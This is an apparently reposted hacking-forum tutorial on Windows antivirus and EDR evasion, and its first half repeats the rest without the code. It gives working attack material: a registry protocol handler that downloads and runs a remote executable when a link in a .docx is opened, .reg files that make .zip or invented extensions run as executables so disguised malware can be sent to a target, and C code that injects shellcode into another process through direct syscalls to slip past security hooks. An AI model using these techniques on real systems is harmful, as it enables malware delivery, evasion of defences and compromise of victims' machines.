D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
I am CRYPTNEEDED an member of an reputable forum xss.is and writing this post for an xss.is
now in this post we are going to cover few interesting topis which plays an important tole in evading.
- bring your own handler:
- your own file extension
- syscalls introductions and understanding of types and basic code.
the first technique is known as bring your own handler:
in this model we will normally can say register an custom protocol handler.
bring your own protocol handler was an modern technique it was an advance method for an initialization access and then code execution. now this method or technique was going to exploit an less familiar feature of window which have an power or an ability to register and then use the protocols. in normal cases and in simple explanation we can say leveraged will be an legitimate the application and handler will be utilize to a manipulate or run our scripts it will be via any web browser any protocol.
this was an strong way to manipulate strong avs and mostly edrs this technique will be mostly utilized by hackers or red teamers. in the end i will attach all code snippet together .
according to the Mozilla developers protocol handler will normally serve the purpose of linking application with particular scheme in the os.
when we register an application to handle a protocol scheme such as http , https://, tell:// or etc you can search on google to find this more utilize them properly. now this protocols will make sure that when the particular scheme will utilized they will integrate with associated application. in other words we can the protocols will be used to create or establish an connection between protocol scheme.
os will allow users to register there custom protocols. will be stored or an utilized in registry. now that mean the application must need to be linked and we will target this links.
over view:
first machine or admin privileges it will store an custom protocol handler for the user in the machine
then it will stores the protocol for the local users or we can say the users which are currently login.
Registering an Custom Protocol :
normally the protocol handler will be register in two ways.
1 window registry manually.
2. will be the utilization of .reg.
lets talk about method 1 first:
first of all open the registry editor then move to HKEY_CURRENT_USER\Software\Classes then right click and then select new and then key and then give them an name like sample.
and then inside sample give or modify the default details like
URL: Sample
then need to create an new string value give them any name .
then need to create the hierarchical keys:
HKEY_CURRENT_USER\Software\Classes\sample\shell
HKEY_CURRENT_USER\Software\Classes\sample\shell\open
HKEY_CURRENT_USER\Software\Classes\sample\shell\open\command
then normally modify the values of command to execute like cmd.exe /c whoami && timeout /t 5
lets verify the protocols.
open any web browser any browser:
then type sample://test make sure to type test: because this is what we given upper then cmd will be appear will display the details according to the command which we given in our case it will display the users.
Lets Talk About Method 2:
an easy way of an doing this is the utilization of .reg.
Код: Скопировать в буфер обмена
in the provided code copy them and change the code according to you need and then make sure to save as the output of filenameany.reg.
verify the file name and then test it again via sample://test.
lets make them more advance for getting initial access.
now normally we are using an simple command but now we will be act as an attacker and will register the protocol that will download and execute.
Код: Скопировать в буфер обмена
in the provided code use .docx file simple create an link and add like ping;//anything as an url.
Conclusion:
windows overlook function will be exploit by attackers and its very stealthy way to manipulate the avs. normally defender will detect the newly registered protocol handler which using simple ways. red teamer or black hat hackers will utilize this way to target there clients and blue teamer or ethical hackers will utilize this way to monitor the changes of registry.
Both the application used for file extensions along with the content type of a file extension are set in the Windows Registry. Recall from the previous module that the registry can be modified using a .reg file.
Код: Скопировать в буфер обмена
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip
This caveat does not occur with custom file extensions which will be demonstrated in the next section.
Код: Скопировать в буфер обмена
if this approch was detected by modern avs use scripting language such as VBS, JS or BAT.
ALL ABOUT SYSCALLS:
system calls which we normally known as an syscalls is an standard and important in which an user mode application will request the required service from the operating system kernel. like as process creation , memory allocation etc. in this article we will continues like how the attackers will utilize this to bypass or evade avs without the utilization of windows api like virtualalloc create process etc normally the edrs or avs will hook the libraries like kernal32.dll or ntdll.dll to analyze the particular api for the malicious behavior. with the utilization of syscalls the user or an attacker will bypass this hooks .
in normal program or applications program will call to api like createfile in the kernal32.dll which will trickle the api in ntdll.dll which then use the syscall to transition from user mode to the kernel. in the syscalls the system will pass service number which we also known as an SSN which is an unique identifier and different for all system calls. to kernals system dispatch table which normally people known as SSDT. now in this mode the kernel will execute the request of program or an operation and then give back control the user.
TYPES OF SYSCALLS.
static syscall.
now this section the static syscall contains an hardcotting ssn for the particular systems to call payloads assembly we can consider an red teamer or hacker will utilize an SSN 0x18 for the NtAllocateVirtualMmeory for an window 10 specific build. now this techniques is pretty straight forward there most important disadvantage is the ssn probability in simple words we can say the ssn will be changed for all the windows version and will particularly changed with updates. it will be helpful when we have enough information regarding the targeted client os version.
Dynamic Syscalls.
now after this issue the dynamic syscall will solve the ssn at runtime with the analyzation of ntdll.dll which will export table memory layout and extract their ssn. this technique is batter and also an portable then the static syscalls because it will work on cross systems without the hardcotting.
Indirect Syscalls.
now the indirect syscall is the most stealthy approach for the evasion basically avoiding the syscall standalone instructions in the provided payload or anything. this approach as we know hell gate or the fresh calls will locate the fresh or we can say the clean syscall stub by comparing the ntdll.dll in our memory rather then copy or by identifying unhook regions.
Implementations of the syscall payload.
now we will cover all the important codes and ways some of them we will cover in upcoming blogs now this c code inline assembly will utilize the dynamic syscall t inject our shellcode in remote process focused on basic evasion for av. it was an proof of concept will utilize and launch the notepad.exe.
code:
Код: Скопировать в буфер обмена
i have used the x64 shellcode which will resolve the createproccess to launch. it will be utilizing an standard and common process injection for the payload in past we have covered many injections point you can utilize any of them.
then the GetSSN function will get an ssn by parsing function of the dll.dll target dll.
each wrapper will utilize inline assembly to loaf the ssn in eax and then invoke the syscalls. and the parameters will utilize the x64 fastcall conversion like (rcx. rdx r8 ).
Advantages of the Syscalls.
it was just an intro to the syscalls along an basic code showing the working syscalls play an big role for the detecetion and its impossible to cover in one blog will utilise things properly the upcomg posts will be intrested i have code an crypter with the utilision of syscalls proccess hollowing api hooking will cover everything in detials but before this its important to utilise and understand the basic concepts first.
Thank You.
now in this post we are going to cover few interesting topis which plays an important tole in evading.
- bring your own handler:
- your own file extension
- syscalls introductions and understanding of types and basic code.
the first technique is known as bring your own handler:
in this model we will normally can say register an custom protocol handler.
bring your own protocol handler was an modern technique it was an advance method for an initialization access and then code execution. now this method or technique was going to exploit an less familiar feature of window which have an power or an ability to register and then use the protocols. in normal cases and in simple explanation we can say leveraged will be an legitimate the application and handler will be utilize to a manipulate or run our scripts it will be via any web browser any protocol.
this was an strong way to manipulate strong avs and mostly edrs this technique will be mostly utilized by hackers or red teamers. in the end i will attach all code snippet together .
according to the Mozilla developers protocol handler will normally serve the purpose of linking application with particular scheme in the os.
when we register an application to handle a protocol scheme such as http , https://, tell:// or etc you can search on google to find this more utilize them properly. now this protocols will make sure that when the particular scheme will utilized they will integrate with associated application. in other words we can the protocols will be used to create or establish an connection between protocol scheme.
os will allow users to register there custom protocols. will be stored or an utilized in registry. now that mean the application must need to be linked and we will target this links.
over view:
first machine or admin privileges it will store an custom protocol handler for the user in the machine
then it will stores the protocol for the local users or we can say the users which are currently login.
Registering an Custom Protocol :
normally the protocol handler will be register in two ways.
1 window registry manually.
2. will be the utilization of .reg.
lets talk about method 1 first:
first of all open the registry editor then move to HKEY_CURRENT_USER\Software\Classes then right click and then select new and then key and then give them an name like sample.
and then inside sample give or modify the default details like
URL: Sample
then need to create an new string value give them any name .
then need to create the hierarchical keys:
HKEY_CURRENT_USER\Software\Classes\sample\shell
HKEY_CURRENT_USER\Software\Classes\sample\shell\open
HKEY_CURRENT_USER\Software\Classes\sample\shell\open\command
then normally modify the values of command to execute like cmd.exe /c whoami && timeout /t 5
lets verify the protocols.
open any web browser any browser:
then type sample://test make sure to type test: because this is what we given upper then cmd will be appear will display the details according to the command which we given in our case it will display the users.
Lets Talk About Method 2:
an easy way of an doing this is the utilization of .reg.
Код: Скопировать в буфер обмена
Код:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\sample]
@="URL:Sample Protocol"
"URL Protocol"=""
[HKEY_CURRENT_USER\Software\Classes\sample\shell]
[HKEY_CURRENT_USER\Software\Classes\sample\shell\open]
[HKEY_CURRENT_USER\Software\Classes\sample\shell\open\command]
@="cmd.exe /c whoami.exe && timeout /t 10"in the provided code copy them and change the code according to you need and then make sure to save as the output of filenameany.reg.
verify the file name and then test it again via sample://test.
lets make them more advance for getting initial access.
now normally we are using an simple command but now we will be act as an attacker and will register the protocol that will download and execute.
Код: Скопировать в буфер обмена
Код:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\ping]
@="URL:Ping Protocol"
"URL Protocol"=""
[HKEY_CURRENT_USER\Software\Classes\ping\shell]
[HKEY_CURRENT_USER\Software\Classes\ping\shell\open]
[HKEY_CURRENT_USER\Software\Classes\ping\shell\open\command]
@="powershell.exe -command \"(New-Object System.Net.WebClient).DownloadFile('http://example.com/mal.exe', 'C:\\mr.d0x\\out.exe'); cmd.exe /c C:\\mr.d0x\\out.exe\""in the provided code use .docx file simple create an link and add like ping;//anything as an url.
Conclusion:
windows overlook function will be exploit by attackers and its very stealthy way to manipulate the avs. normally defender will detect the newly registered protocol handler which using simple ways. red teamer or black hat hackers will utilize this way to target there clients and blue teamer or ethical hackers will utilize this way to monitor the changes of registry.
Your Own File Extensions
File extensions are an important part of any OS because they inform the OS which application should be used when the file is double-clicked. For example, when a .pdf file is clicked, it should be opened with a different application compared to when a file with the extension .png is opened.Both the application used for file extensions along with the content type of a file extension are set in the Windows Registry. Recall from the previous module that the registry can be modified using a .reg file.
Initial Access Technique
This initial access technique will make use of a .reg file to modify the content type of a benign file extension, in this case, .zip, to become executable. Next, an executable file with the .zip file extension will be sent with the .reg file. Upon the user executing the .reg file and successfully modifying the content type of .zip, it will result in the .zip file acting as a .exe when double-clicked..reg File Setup
Create and open a .reg file using any text editor (e.g. notepad) and paste the following snippet. The snippet below will modify the content type of .zip files to become an executable type.Код: Скопировать в буфер обмена
Код:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\.zip]
@="exefile"
"Content Type"="x-msdownload".zip File Setup
Create a malicious .exe file and modify the file extension to .zip. Finally, zip both the .reg and the .zip files and send the resulting ZIP to the target user.Caveats & Registry Conflicts
Keep in mind that when overwriting existing file extensions, this technique may not work with all of them. Additionally, for some pre-existing file extensions, it may require the removal of other conflicting registry keys first to work. Continuing with the .zip example, the key below could potentially be conflicting and may require removal first.HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip
This caveat does not occur with custom file extensions which will be demonstrated in the next section.
Custom File Extension
Although this demo modifies the .zip file extension to become executable, one has the ability to create a completely new file extension. The .reg file shown below creates a .microsoft executable file extensionКод: Скопировать в буфер обмена
Код:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\.microsoft]
@="exefile"
"Content Type"="x-msdownload"if this approch was detected by modern avs use scripting language such as VBS, JS or BAT.
ALL ABOUT SYSCALLS:
system calls which we normally known as an syscalls is an standard and important in which an user mode application will request the required service from the operating system kernel. like as process creation , memory allocation etc. in this article we will continues like how the attackers will utilize this to bypass or evade avs without the utilization of windows api like virtualalloc create process etc normally the edrs or avs will hook the libraries like kernal32.dll or ntdll.dll to analyze the particular api for the malicious behavior. with the utilization of syscalls the user or an attacker will bypass this hooks .
in normal program or applications program will call to api like createfile in the kernal32.dll which will trickle the api in ntdll.dll which then use the syscall to transition from user mode to the kernel. in the syscalls the system will pass service number which we also known as an SSN which is an unique identifier and different for all system calls. to kernals system dispatch table which normally people known as SSDT. now in this mode the kernel will execute the request of program or an operation and then give back control the user.
TYPES OF SYSCALLS.
static syscall.
now this section the static syscall contains an hardcotting ssn for the particular systems to call payloads assembly we can consider an red teamer or hacker will utilize an SSN 0x18 for the NtAllocateVirtualMmeory for an window 10 specific build. now this techniques is pretty straight forward there most important disadvantage is the ssn probability in simple words we can say the ssn will be changed for all the windows version and will particularly changed with updates. it will be helpful when we have enough information regarding the targeted client os version.
Dynamic Syscalls.
now after this issue the dynamic syscall will solve the ssn at runtime with the analyzation of ntdll.dll which will export table memory layout and extract their ssn. this technique is batter and also an portable then the static syscalls because it will work on cross systems without the hardcotting.
Indirect Syscalls.
now the indirect syscall is the most stealthy approach for the evasion basically avoiding the syscall standalone instructions in the provided payload or anything. this approach as we know hell gate or the fresh calls will locate the fresh or we can say the clean syscall stub by comparing the ntdll.dll in our memory rather then copy or by identifying unhook regions.
Implementations of the syscall payload.
now we will cover all the important codes and ways some of them we will cover in upcoming blogs now this c code inline assembly will utilize the dynamic syscall t inject our shellcode in remote process focused on basic evasion for av. it was an proof of concept will utilize and launch the notepad.exe.
code:
Код: Скопировать в буфер обмена
Код:
#include <windows.h>
#include <stdio.h>
// Define NTSTATUS type
typedef LONG NTSTATUS;
// Function prototypes for syscall wrappers
typedef NTSTATUS (NTAPI *NtAllocateVirtualMemory_t)(HANDLE, PVOID*, ULONG_PTR, SIZE_T*, ULONG, ULONG);
typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)(HANDLE, PVOID, PVOID, SIZE_T, SIZE_T*);
typedef NTSTATUS (NTAPI *NtCreateThreadEx_t)(PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);
// Shellcode to launch notepad.exe (x64)
unsigned char shellcode[] = {
0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52,
0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72,
0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41,
0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B,
0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41,
0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1,
0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44,
0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01,
0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48,
0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D,
0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5,
0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0,
0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89,
0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 0x65,
0x78, 0x65, 0x00
};
// Resolve SSN dynamically from ntdll.dll
DWORD GetSSN(const char* funcName) {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) return 0;
FARPROC funcAddr = GetProcAddress(hNtdll, funcName);
if (!funcAddr) return 0;
// SSN is at offset 4 in the function prologue (e.g., mov eax, SSN)
return *(DWORD*)((BYTE*)funcAddr + 4);
}
// Syscall wrappers using inline assembly
NTSTATUS NtAllocateVirtualMemorySyscall(HANDLE hProcess, PVOID* baseAddr, ULONG_PTR zeroBits, SIZE_T* regionSize, ULONG allocType, ULONG protect) {
DWORD ssn = GetSSN("NtAllocateVirtualMemory");
NTSTATUS status;
__asm {
mov r10, rcx // x64 calling convention: move params to registers
mov eax, ssn // Load SSN into eax
syscall // Invoke syscall
mov status, eax // Store return value
}
return status;
}
NTSTATUS NtWriteVirtualMemorySyscall(HANDLE hProcess, PVOID baseAddr, PVOID buffer, SIZE_T bufferSize, SIZE_T* bytesWritten) {
DWORD ssn = GetSSN("NtWriteVirtualMemory");
NTSTATUS status;
__asm {
mov r10, rcx
mov eax, ssn
syscall
mov status, eax
}
return status;
}
NTSTATUS NtCreateThreadExSyscall(PHANDLE hThread, ACCESS_MASK desiredAccess, PVOID objAttributes, HANDLE hProcess, PVOID startAddr, PVOID param, ULONG flags, SIZE_T stackZeroBits, SIZE_T stackSize, SIZE_T maxStackSize, PVOID attributeList) {
DWORD ssn = GetSSN("NtCreateThreadEx");
NTSTATUS status;
__asm {
mov r10, rcx
mov eax, ssn
syscall
mov status, eax
}
return status;
}
int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: %s <PID>\n", argv[0]);
return 1;
}
// Open target process
DWORD pid = atoi(argv[1]);
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) {
printf("Failed to open process %d\n", pid);
return 1;
}
// Allocate memory in target process
PVOID baseAddr = NULL;
SIZE_T shellcodeSize = sizeof(shellcode);
NTSTATUS status = NtAllocateVirtualMemorySyscall(hProcess, &baseAddr, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (status != 0) {
printf("NtAllocateVirtualMemory failed: 0x%08X\n", status);
CloseHandle(hProcess);
return 1;
}
// Write shellcode to target process
SIZE_T bytesWritten;
status = NtWriteVirtualMemorySyscall(hProcess, baseAddr, shellcode, sizeof(shellcode), &bytesWritten);
if (status != 0 || bytesWritten != sizeof(shellcode)) {
printf("NtWriteVirtualMemory failed: 0x%08X\n", status);
CloseHandle(hProcess);
return 1;
}
// Create thread to execute shellcode
HANDLE hThread;
status = NtCreateThreadExSyscall(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, baseAddr, NULL, 0, 0, 0, 0, NULL);
if (status != 0) {
printf("NtCreateThreadEx failed: 0x%08X\n", status);
CloseHandle(hProcess);
return 1;
}
printf("Shellcode injected into PID %d\n", pid);
WaitForSingleObject(hThread, INFINITE);
// Cleanup
CloseHandle(hThread);
CloseHandle(hProcess);
return 0;
}i have used the x64 shellcode which will resolve the createproccess to launch. it will be utilizing an standard and common process injection for the payload in past we have covered many injections point you can utilize any of them.
then the GetSSN function will get an ssn by parsing function of the dll.dll target dll.
each wrapper will utilize inline assembly to loaf the ssn in eax and then invoke the syscalls. and the parameters will utilize the x64 fastcall conversion like (rcx. rdx r8 ).
Advantages of the Syscalls.
- the main focus is it will reduce the detecetion from avs and edr in past we talk about an how the avs and edr detect and why we use syscalls.
- syscalls will allow the pentesters to enable the execution in memory.
- it will bypass the hooks we covered them in brief already and shellcode is an precisely placed and then it will be executed in the process which we used for an target.
it was just an intro to the syscalls along an basic code showing the working syscalls play an big role for the detecetion and its impossible to cover in one blog will utilise things properly the upcomg posts will be intrested i have code an crypter with the utilision of syscalls proccess hollowing api hooking will cover everything in detials but before this its important to utilise and understand the basic concepts first.
Thank You.